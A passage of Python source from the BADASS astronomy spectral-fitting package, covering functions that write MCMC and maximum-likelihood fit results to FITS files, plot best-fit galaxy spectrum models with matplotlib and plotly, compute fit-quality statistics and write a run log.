col9 = fits.Column(name='median', format='E', array=median)
col10 = fits.Column(name='med_abs_dev', format='E', array=med_abs_dev)
col11 = fits.Column(name='flag', format='E', array=flags)
cols = fits.ColDefs([col1,col2,col3,col4,col5,col6,col7,col8,col9,col10,col11])
table_hdu = fits.BinTableHDU.from_columns(cols)
if binnum is not None:
header_dict['binnum'] = binnum
# Header information
hdr = fits.Header()
for key in header_dict:
hdr[key] = header_dict[key]
empty_primary = fits.PrimaryHDU(header=hdr)
hdu = fits.HDUList([empty_primary,table_hdu])
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdu.append(hdu2)
hdu.writeto(run_dir.joinpath('log', 'par_table.fits'), overwrite=True)
del hdu
# Write full param dict to log file
write_log((par_names,par_best,ci_68_low,ci_68_upp,ci_95_low,ci_95_upp,mean,std_dev,median,med_abs_dev,flags),'emcee_results',run_dir)
return
def write_chains(param_dict,run_dir):
"""
Writes all MCMC chains to a FITS Image HDU. Each FITS
extension corresponds to
"""
# for key in param_dict:
# print(key,np.shape(param_dict[key]["chain"]))
cols = []
# Construct a column for each parameter and chain
for key in param_dict:
# cols.append(fits.Column(name=key, format='D',array=param_dict[key]['chain']))
values = param_dict[key]['chain']
cols.append(fits.Column(name=key, format="%dD" % (values.shape[0]*values.shape[1]), dim="(%d,%d)" % (values.shape[1],values.shape[0]), array=[values]))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'MCMC_chains.fits'), overwrite=True)
return
def plot_best_model(param_dict,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
fit_stat,
velscale,
run_dir):
"""
Plots the best fig model and outputs the components to a FITS file for reproduction.
"""
param_names = [key for key in param_dict ]
par_best = [param_dict[key]['par_best'] for key in param_dict ]
def poly_label(kind):
if kind=="ppoly":
order = len([p for p in param_names if p.startswith("PPOLY_") ])-1
if kind=="apoly":
order = len([p for p in param_names if p.startswith("APOLY_")])-1
if kind=="mpoly":
order = len([p for p in param_names if p.startswith("MPOLY_")])-1
#
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(n//10%10!=1)*(n%10<4)*n%10::4])
return ordinal(order)
def calc_new_center(center,voff):
"""
Calculated new center shifted
by some velocity offset.
"""
c = 299792.458 # speed of light (km/s)
new_center = (voff*center)/c + center
return new_center
output_model = True
fit_type = 'final'
comp_dict = fit_model(par_best,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# Put params in dictionary
p = dict(zip(param_names,par_best))
# Maximum Likelihood plot
fig = plt.figure(figsize=(14,6))
gs = gridspec.GridSpec(4, 1)
gs.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
ax1 = plt.subplot(gs[0:3,0])
ax2 = plt.subplot(gs[3,0])
for key in comp_dict:
if (key=='DATA'):
ax1.plot(comp_dict['WAVE'],comp_dict['DATA'],linewidth=0.5,color='white',label='Data',zorder=0)
elif (key=='MODEL'):
ax1.plot(lam_gal,comp_dict[key], color='xkcd:bright red', linewidth=1.0, label='Model', zorder=15)
elif (key=='HOST_GALAXY'):
ax1.plot(comp_dict['WAVE'], comp_dict['HOST_GALAXY'], color='xkcd:bright green', linewidth=0.5, linestyle='-', label='Host/Stellar')
elif (key=='POWER'):
ax1.plot(comp_dict['WAVE'], comp_dict['POWER'], color='xkcd:red' , linewidth=0.5, linestyle='--', label='AGN Cont.')
elif (key=='PPOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['PPOLY'], color='xkcd:magenta' , linewidth=0.5, linestyle='-', label='%s-order Poly.' % (poly_label("ppoly")))
elif (key=='APOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['APOLY'], color='xkcd:bright purple' , linewidth=0.5, linestyle='-', label='%s-order Add. Poly.' % (poly_label("apoly")))
elif (key=='MPOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['MPOLY'], color='xkcd:lavender' , linewidth=0.5, linestyle='-', label='%s-order Mult. Poly.' % (poly_label("mpoly")))
elif (key in ['NA_OPT_FEII_TEMPLATE','BR_OPT_FEII_TEMPLATE']):
ax1.plot(comp_dict['WAVE'], comp_dict['NA_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='Narrow FeII')
ax1.plot(comp_dict['WAVE'], comp_dict['BR_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='Broad FeII')
elif (key in ['F_OPT_FEII_TEMPLATE','S_OPT_FEII_TEMPLATE','G_OPT_FEII_TEMPLATE','Z_OPT_FEII_TEMPLATE']):
if key=='F_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['F_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='F-transition FeII')
elif key=='S_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['S_OPT_FEII_TEMPLATE'], color='xkcd:mustard', linewidth=0.5, linestyle='-' , label='S-transition FeII')
elif key=='G_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['G_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='G-transition FeII')
elif key=='Z_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['Z_OPT_FEII_TEMPLATE'], color='xkcd:rust', linewidth=0.5, linestyle='-' , label='Z-transition FeII')
elif (key=='UV_IRON_TEMPLATE'):
ax1.plot(comp_dict['WAVE'], comp_dict['UV_IRON_TEMPLATE'], color='xkcd:bright purple', linewidth=0.5, linestyle='-' , label='UV Iron' )
elif (key=='BALMER_CONT'):
ax1.plot(comp_dict['WAVE'], comp_dict['BALMER_CONT'], color='xkcd:bright green', linewidth=0.5, linestyle='--' , label='Balmer Continuum' )
# Plot emission lines by cross-referencing comp_dict with line_list
if (key in line_list):
if (line_list[key]["line_type"]=="na"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:cerulean', linewidth=0.5, linestyle='-', label='Narrow/Core Comp.')
if (line_list[key]["line_type"]=="br"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:bright teal', linewidth=0.5, linestyle='-', label='Broad Comp.')
if (line_list[key]["line_type"]=="out"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:bright pink', linewidth=0.5, linestyle='-', label='Outflow Comp.')
if (line_list[key]["line_type"]=="abs"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:pastel red', linewidth=0.5, linestyle='-', label='Absorption Comp.')
if (line_list[key]["line_type"]=="user"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:electric lime', linewidth=0.5, linestyle='-', label='Other')
# Plot bad pixels
ibad = [i for i in range(len(lam_gal)) if i not in fit_mask]
if (len(ibad)>0):# and (len(ibad[0])>1):
bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
ax1.axvspan(bad_wave[0][0],bad_wave[0][0],alpha=0.25,color='xkcd:lime green',label="bad pixels")
for i in bad_wave[1:]:
ax1.axvspan(i[0],i[0],alpha=0.25,color='xkcd:lime green')
ax1.set_xticklabels([])
ax1.set_xlim(np.min(lam_gal)-10,np.max(lam_gal)+10)
# ax1.set_ylim(-0.5*np.median(comp_dict['MODEL']),np.max([comp_dict['DATA'],comp_dict['MODEL']]))
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=10)
# Residuals
sigma_resid = np.nanstd(comp_dict['DATA'][fit_mask]-comp_dict['MODEL'][fit_mask])
sigma_noise = np.median(comp_dict['NOISE'][fit_mask])
ax2.plot(lam_gal,(comp_dict['NOISE']*3.0),linewidth=0.5,color="xkcd:bright orange",label='$\sigma_{\mathrm{noise}}=%0.4f$' % (sigma_noise))
ax2.plot(lam_gal,(comp_dict['RESID']*3.0),linewidth=0.5,color="white",label='$\sigma_{\mathrm{resid}}=%0.4f$' % (sigma_resid))
ax1.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
ax2.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
# Axes limits
ax_low = np.min([ax1.get_ylim()[0],ax2.get_ylim()[0]])
ax_upp = np.nanmax(comp_dict['DATA'][fit_mask])+(3.0 * np.nanmedian(comp_dict['NOISE'][fit_mask])) # np.max([ax1.get_ylim()[1], ax2.get_ylim()[1]])
# if np.isfinite(sigma_resid):
# ax_upp += 3.0 * sigma_resid
minimum = [np.nanmin(comp_dict[comp][np.where(np.isfinite(comp_dict[comp]))[0]]) for comp in comp_dict
if comp_dict[comp][np.isfinite(comp_dict[comp])[0]].size > 0]
if len(minimum) > 0:
minimum = np.nanmin(minimum)
else:
minimum = 0.0
ax1.set_ylim(np.nanmin([0.0, minimum]), ax_upp)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax2.set_ylim(ax_low,ax_upp)
ax2.set_xlim(np.min(lam_gal),np.max(lam_gal))
# Axes labels
ax2.set_yticklabels(np.round(np.array(ax2.get_yticks()/3.0)))
ax2.set_ylabel(r'$\Delta f_\lambda$',fontsize=12)
ax2.set_xlabel(r'Wavelength, $\lambda\;(\mathrm{\AA})$',fontsize=12)
handles, labels = ax1.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
ax1.legend(by_label.values(), by_label.keys(),loc='upper right',fontsize=8)
ax2.legend(loc='upper right',fontsize=8)
# Emission line annotations
# Gather up emission line center wavelengths and labels (if available, removing any duplicates)
line_labels = []
for line in line_list:
if "label" in line_list[line]:
line_labels.append([line,line_list[line]["label"]])
line_labels = set(map(tuple, line_labels))
for label in line_labels:
center = line_list[label[0]]["center"]
if (line_list[label[0]]["voff"]=="free"):
voff = p[label[0]+"_VOFF"]
elif (line_list[label[0]]["voff"]!="free"):
voff = ne.evaluate(line_list[label[0]]["voff"],local_dict = p).item()
xloc = calc_new_center(center,voff)
yloc = np.max([comp_dict["DATA"][find_nearest(lam_gal,xloc)[1]],comp_dict["MODEL"][find_nearest(lam_gal,xloc)[1]]])
ax1.annotate(label[1], xy=(xloc, yloc), xycoords='data',
xytext=(xloc, yloc), textcoords='data',
horizontalalignment='center', verticalalignment='bottom',
color='xkcd:white',fontsize=6,
)
# Save figure
plt.savefig(run_dir.joinpath('best_fit_model.pdf'))
# Close plot
fig.clear()
plt.close()
# Store best-fit components in a FITS file
# Construct a column for each parameter and chain
cols = []
for key in comp_dict:
cols.append(fits.Column(name=key, format='E', array=comp_dict[key]))
# Add fit mask to cols
cols.append(fits.Column(name="MASK", format='E', array=fit_mask))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'best_model_components.fits'), overwrite=True)
return comp_dict
def fit_quality_pars(param_dict,line_list,combined_line_list,comp_dict,fit_mask,fit_type,fit_stat):
fit_quality_dict = {}
if fit_stat=="RCHI2":
if fit_type=="max_like":
noise = comp_dict["NOISE"]*param_dict["NOISE_SCALE"]["med"]
elif fit_type=="mcmc":
noise = comp_dict["NOISE"]*param_dict["NOISE_SCALE"]["par_best"]
elif fit_stat!="RHIC2":
noise = comp_dict["NOISE"]
# compute NPIX for each line in the line list
for l in line_list:
npix = len(np.where(comp_dict[l]>noise)[0])
if fit_type=="max_like":
fit_quality_dict[l+"_NPIX"] = {"med":npix,"std":0,"flag":0}
elif fit_type=="mcmc":
fit_quality_dict[l+"_NPIX"] = {"par_best":npix,
"ci_68_low":0,"ci_68_upp":0,
"ci_95_low":0,"ci_95_upp":0,
"mean":0,"std_dev":0,
"median":0,"med_abs_dev":0,
"flag":0
}
# compute NPIX for any combined lines
if len(combined_line_list)>0:
for c in combined_line_list:
comb_line = np.zeros(len(noise))
for l in combined_line_list[c]["lines"]:
comb_line+=comp_dict[l]
npix = len(np.where(comb_line>noise)[0])
if fit_type=="max_like":
fit_quality_dict[c+"_NPIX"] = {"med":npix,"std":0,"flag":0}
elif fit_type=="mcmc":
fit_quality_dict[c+"_NPIX"] = {"par_best":npix,
"ci_68_low":0,"ci_68_upp":0,
"ci_95_low":0,"ci_95_upp":0,
"mean":0,"std_dev":0,
"median":0,"med_abs_dev":0,
"flag":0
}
# compute a total chi-squared and r-squared
r_sqaured = 1-(np.sum((comp_dict["DATA"][fit_mask]-comp_dict["MODEL"][fit_mask])**2/np.sum(comp_dict["DATA"][fit_mask]**2)))
nu = len(comp_dict["DATA"])-len(param_dict)
rchi_squared = (np.sum((comp_dict["DATA"][fit_mask]-comp_dict["MODEL"][fit_mask])**2/(noise[fit_mask])**2,axis=0))/nu
if fit_type=="max_like":
fit_quality_dict["R_SQUARED"] = {"med":r_sqaured,"std":0,"flag":0}
fit_quality_dict["RCHI_SQUARED"] = {"med":rchi_squared,"std":0,"flag":0}
elif fit_type=="mcmc":
fit_quality_dict["R_SQUARED"] = {"par_best":r_sqaured,
"ci_68_low":0,"ci_68_upp":0,
"ci_95_low":0,"ci_95_upp":0,
"mean":0,"std_dev":0,
"median":0,"med_abs_dev":0,
"flag":0
}
fit_quality_dict["RCHI_SQUARED"] = {"par_best":rchi_squared,
"ci_68_low":0,"ci_68_upp":0,
"ci_95_low":0,"ci_95_upp":0,
"mean":0,"std_dev":0,
"median":0,"med_abs_dev":0,
"flag":0
}
return fit_quality_dict
def write_max_like_results(result_dict,comp_dict,header_dict,fit_mask,run_dir,
binnum=None,spaxelx=None,spaxely=None):
"""
Write maximum likelihood fit results to FITS table
if MCMC is not performed.
"""
# for key in result_dict:
# print(key, result_dict[key])
# Extract elements from dictionaries
par_names = []
par_best = []
sig = []
for key in result_dict:
par_names.append(key)
par_best.append(result_dict[key]['med'])
if "std" in result_dict[key]:
sig.append(result_dict[key]['std'])
# Sort the fit results
i_sort = np.argsort(par_names)
par_names = np.array(par_names)[i_sort]
par_best = np.array(par_best)[i_sort]
sig = np.array(sig)[i_sort]
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit' , format='E' , array=par_best)
if "std" in result_dict[par_names[0]]:
col3 = fits.Column(name='sigma' , format='E' , array=sig)
if "std" in result_dict[par_names[0]]:
cols = fits.ColDefs([col1,col2,col3])
else:
cols = fits.ColDefs([col1,col2])
table_hdu = fits.BinTableHDU.from_columns(cols)
# Header information
hdr = fits.Header()
if binnum is not None:
header_dict['binnum'] = binnum
for key in header_dict:
hdr[key] = header_dict[key]
empty_primary = fits.PrimaryHDU(header=hdr)
hdu = fits.HDUList([empty_primary, table_hdu])
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdu.append(hdu2)
hdu.writeto(run_dir.joinpath('log', 'par_table.fits'), overwrite=True)
del hdu
# Write best-fit components to FITS file
cols = []
# Construct a column for each parameter and chain
for key in comp_dict:
cols.append(fits.Column(name=key, format='E', array=comp_dict[key]))
# Add fit mask to cols
mask = np.zeros(len(comp_dict["WAVE"]),dtype=bool)
mask[fit_mask] = True
cols.append(fits.Column(name="MASK", format='E', array=mask))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'best_model_components.fits'), overwrite=True)
#
return
def plotly_best_fit(objname,line_list,fit_mask,run_dir):
"""
Generates an interactive HTML plot of the best fit model
using plotly.
"""
import plotly.graph_objects as go
from plotly.subplots import make_subplots
# Open the best_fit_components file
hdu = fits.open(run_dir.joinpath("log", "best_model_components.fits") )
tbdata = hdu[1].data # FITS table data is stored on FITS extension 1
cols = [i.name for i in tbdata.columns]
hdu.close()
# Create a figure with subplots
fig = make_subplots(rows=2, cols=1, row_heights=(3,1) )
# tracenames = []
# Plot
for comp in cols:
if comp=="DATA":
tracename = "Data"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["DATA"] , mode="lines", line=go.scatter.Line(color="white", width=1), name=tracename, legendrank=1, showlegend=True), row=1, col=1)
if comp=="MODEL":
tracename="Model"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["MODEL"], mode="lines", line=go.scatter.Line(color="red" , width=1), name=tracename, legendrank=2, showlegend=True), row=1, col=1)
if comp=="NOISE":
tracename="Noise"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["NOISE"], mode="lines", line=go.scatter.Line(color="#FE00CE" , width=1), name=tracename, legendrank=3, showlegend=True), row=1, col=1)
# Continuum components
if comp=="HOST_GALAXY":
tracename="Host Galaxy"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["HOST_GALAXY"], mode="lines", line=go.scatter.Line(color="lime", width=1), name=tracename, legendrank=4, showlegend=True), row=1, col=1)
if comp=="POWER":
tracename="Power-law"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["POWER"], mode="lines", line=go.scatter.Line(color="red", width=1, dash="dash"), name=tracename, legendrank=5, showlegend=True), row=1, col=1)
if comp=="BALMER_CONT":
tracename="Balmer cont."
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["BALMER_CONT"], mode="lines", line=go.scatter.Line(color="lime", width=1, dash="dash"), name=tracename, legendrank=6, showlegend=True), row=1, col=1)
# FeII componentes
if comp=="UV_IRON_TEMPLATE":
tracename="UV Iron"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["UV_IRON_TEMPLATE"], mode="lines", line=go.scatter.Line(color="#AB63FA", width=1), name=tracename, legendrank=7, showlegend=True), row=1, col=1)
if comp=="NA_OPT_FEII_TEMPLATE":
tracename="Narrow FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["NA_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="rgb(255,255,51)", width=1), name=tracename, legendrank=7, showlegend=True), row=1, col=1)
if comp=="BR_OPT_FEII_TEMPLATE":
tracename="Broad FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["BR_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="#FF7F0E", width=1), name=tracename, legendrank=8, showlegend=True), row=1, col=1)
if comp=='F_OPT_FEII_TEMPLATE':
tracename="F-transition FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["F_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="rgb(255,255,51)", width=1), name=tracename, legendrank=7, showlegend=True), row=1, col=1)
if comp=='S_OPT_FEII_TEMPLATE':
tracename="S-transition FeII"
fig.add_trace(go.Scatter( x = tbdata["waVe"], y = tbdata["S_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="rgb(230,171,2)", width=1), name=tracename, legendrank=8, showlegend=True), row=1, col=1)
if comp=='G_OPT_FEII_TEMPLATE':
tracename="G-transition FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["G_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="#FF7F0E", width=1), name=tracename, legendrank=9, showlegend=True), row=1, col=1)
if comp=='Z_OPT_FEII_TEMPLATE':
tracename="Z-transition FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["Z_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="rgb(217,95,2)", width=1), name=tracename, legendrank=10, showlegend=True), row=1, col=1)
# Line components
if comp in line_list:
if line_list[comp]["line_type"]=="na":
# tracename="narrow line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="#00B5F7", width=1), name=comp, legendgroup="narrow lines",legendgrouptitle_text="narrow lines", legendrank=11,), row=1, col=1)
# tracenames.append(tracename)
if line_list[comp]["line_type"]=="br":
# tracename="broad line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="#22FFA7", width=1), name=comp, legendgroup="broad lines",legendgrouptitle_text="broad lines", legendrank=13,), row=1, col=1)
# tracenames.append(tracename)
if line_list[comp]["line_type"]=="out":
# tracename="outflow line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="#FC0080", width=1), name=comp, legendgroup="outflow lines",legendgrouptitle_text="outflow lines", legendrank=14,), row=1, col=1)
# tracenames.append(tracename)
if line_list[comp]["line_type"]=="abs":
# tracename="absorption line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="#DA16FF", width=1), name=comp, legendgroup="absorption lines",legendgrouptitle_text="absorption lines", legendrank=15,), row=1, col=1)
# tracenames.append(tracename)
if line_list[comp]["line_type"]=="user":
# tracename="absorption line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="rgb(153,201,59)", width=1), name=comp, legendgroup="user lines",legendgrouptitle_text="user lines", legendrank=16,), row=1, col=1)
# tracenames.append(tracename)
fig.add_hline(y=0.0, line=dict(color="gray", width=2), row=1, col=1)
# Plot bad pixels
# lam_gal = tbdata["WAVE"]
# ibad = [i for i in range(len(lam_gal)) if i not in fit_mask]
# if (len(ibad)>0):# and (len(ibad[0])>1):
# bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
# # ax1.axvspan(bad_wave[0][0],bad_wave[0][0],alpha=0.25,color='xkcd:lime green',label="bad pixels")
# fig.add_vrect(
# x0=bad_wave[0][0], x1=bad_wave[0][0],
# fillcolor="rgb(179,222,105)", opacity=0.25,
# layer="below", line_width=0,name="bad pixels",
# ),
# for i in bad_wave[1:]:
# # ax1.axvspan(i[0],i[0],alpha=0.25,color='xkcd:lime green')
# fig.add_vrect(
# x0=i[0], x1=i[1],
# fillcolor="rgb(179,222,105)", opacity=0.25,
# layer="below", line_width=0,name="bad pixels",
# ),
# Residuals
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["RESID"], mode="lines", line=go.scatter.Line(color="white" , width=1), name="Residuals", showlegend=False), row=2, col=1)
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["NOISE"], mode="lines", line=go.scatter.Line(color="#FE00CE" , width=1), name="Noise", showlegend=False, legendrank=3,), row=2, col=1)
# Figure layout, size, margins
fig.update_layout(
autosize=False,
width=1700,
height=800,
margin=dict(
l=100,
r=100,
b=100,
t=100,
pad=1
),
title= objname,
font_family="Times New Roman",
font_size=16,
font_color="white",
legend_title_text="Components",
legend_bgcolor="black",
paper_bgcolor="black",
plot_bgcolor="black",
)
# Update x-axis properties
fig.update_xaxes(title=r"$\Large\lambda_{\rm{rest}}\;\left[Å\right]$", linewidth=0.5, linecolor="gray", mirror=True,
gridwidth=1, gridcolor="#222A2A", zerolinewidth=2, zerolinecolor="#222A2A",
row=1, col=1)
fig.update_xaxes(title=r"$\Large\lambda_{\rm{rest}}\;\left[Å\right]$", linewidth=0.5, linecolor="gray", mirror=True,
gridwidth=1, gridcolor="#222A2A", zerolinewidth=2, zerolinecolor="#222A2A",
row=2, col=1)
# Update y-axis properties
fig.update_yaxes(title=r"$\Large f_\lambda\;\left[\rm{erg}\;\rm{cm}^{-2}\;\rm{s}^{-1}\;Å^{-1}\right]$", linewidth=0.5, linecolor="gray", mirror=True,
gridwidth=1, gridcolor="#222A2A", zerolinewidth=2, zerolinecolor="#222A2A",
row=1, col=1)
fig.update_yaxes(title=r"$\Large\Delta f_\lambda$", linewidth=0.5, linecolor="gray", mirror=True,
gridwidth=1, gridcolor="#222A2A", zerolinewidth=2, zerolinecolor="#222A2A",
row=2, col=1)
fig.update_xaxes(matches='x')
# fig.update_yaxes(matches='y')
# fig.show()
# Write to HTML
fig.write_html(run_dir.joinpath("%s_bestfit.html" % objname),include_mathjax="cdn")
# Write to PDF
# fig.write_image(run_dir.joinpath("%s_bestfit.pdf" % objname))
return
# Clean-up Routine
##################################################################################
def cleanup(run_dir):
"""
Cleans up the run directory.
"""
# Remove param_plots folder if empty
histo_dir = run_dir.joinpath('histogram_plots')
if histo_dir.is_dir() and not any(histo_dir.iterdir()):
histo_dir.rmdir()
# If run_dir is empty because there aren't enough good pixels, remove it
if run_dir.is_dir() and not any(run_dir.iterdir()):
run_dir.rmdir()
return None
##################################################################################
def write_log(output_val,output_type,run_dir):
"""
This function writes values to a log file as the code runs.
"""
log_file_path = run_dir.joinpath('log', 'log_file.txt')
log_file_path.parent.mkdir(parents=True, exist_ok=True)
if not log_file_path.is_file():
with log_file_path.open(mode='w') as logfile:
logfile.write('\n############################### BADASS v9.1.1 LOGFILE ####################################\n')
# sdss_prepare
# output_val=(file,ra,dec,z,fit_min,fit_max,velscale,ebv), output_type=0
if (output_type=='prepare_sdss_spec'):
fits_file,ra,dec,z,cosmology,fit_min,fit_max,velscale,ebv = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('file:' , fits_file.name ))
logfile.write('\n{0:<30}{1:<30}'.format('(RA, DEC):' , '(%0.6f,%0.6f)' % (ra,dec) ))
logfile.write('\n{0:<30}{1:<30}'.format('SDSS redshift:' , '%0.5f' % z ))
logfile.write('\n{0:<30}{1:<30}'.format('fitting region:' , '(%d,%d) [A]' % (fit_min,fit_max) ))
logfile.write('\n{0:<30}{1:<30}'.format('velocity scale:' , '%0.2f [km/s/pixel]' % velscale))
logfile.write('\n{0:<30}{1:<30}'.format('Galactic E(B-V):', '%0.3f' % ebv))
logfile.write('\n')
logfile.write('\n{0:<30}'.format('Units:'))
logfile.write('\n{0:<30}'.format(' - Note: SDSS Spectra are in units of [1.e-17 erg/s/cm2/Å]'))
logfile.write('\n{0:<30}'.format(' - Velocity, dispersion, and FWHM have units of [km/s]'))
logfile.write('\n{0:<30}'.format(' - Fluxes and Luminosities are in log-10'))
logfile.write('\n')
logfile.write('\n{0:<30}'.format('Cosmology:'))
logfile.write('\n{0:<30}'.format(' H0 = %0.1f' % cosmology["H0"]))
logfile.write('\n{0:<30}'.format(' Om0 = %0.2f' % cosmology["Om0"]))
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='prepare_user_spec'):
fits_file,z,cosmology,fit_min,fit_max,velscale,ebv = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('file:' , fits_file.name ))
# logfile.write('\n{0:<30}{1:<30}'.format('(RA, DEC):' , '(%0.6f,%0.6f)' % (ra,dec) ))
logfile.write('\n{0:<30}{1:<30}'.format('SDSS redshift:' , '%0.5f' % z ))
logfile.write('\n{0:<30}{1:<30}'.format('fitting region:' , '(%d,%d) [A]' % (fit_min,fit_max) ))
logfile.write('\n{0:<30}{1:<30}'.format('velocity scale:' , '%0.2f [km/s/pixel]' % velscale))
logfile.write('\n{0:<30}{1:<30}'.format('Galactic E(B-V):', '%0.3f' % ebv))
logfile.write('\n')
logfile.write('\n{0:<30}'.format('Units:'))
logfile.write('\n{0:<30}'.format(' - Note: SDSS Spectra are in units of [1.e-17 erg/s/cm2/Å]'))
logfile.write('\n{0:<30}'.format(' - Velocity, dispersion, and FWHM have units of [km/s]'))
logfile.write('\n{0:<30}'.format(' - Fluxes and Luminosities are in log-10'))
logfile.write('\n')
logfile.write('\n{0:<30}'.format('Cosmology:'))
logfile.write('\n{0:<30}'.format(' H0 = %0.1f' % cosmology["H0"]))
logfile.write('\n{0:<30}'.format(' Om0 = %0.2f' % cosmology["Om0"]))
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='fit_information'):
fit_options,mcmc_options,comp_options,losvd_options,host_options,power_options,poly_options,opt_feii_options,uv_iron_options,balmer_options,\
plot_options,output_options = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### User-Input Fitting Paramters & Options ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n')
# General fit options
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' fit_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_reg',':',str(fit_options['fit_reg']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('good_thresh',':',str(fit_options['good_thresh']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('mask_bad_pix',':',str(fit_options['mask_bad_pix']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('n_basinhop',':',str(fit_options['n_basinhop']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('test_outflows',':',str(fit_options['test_outflows']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('test_line',':',str(fit_options['test_line']) ))
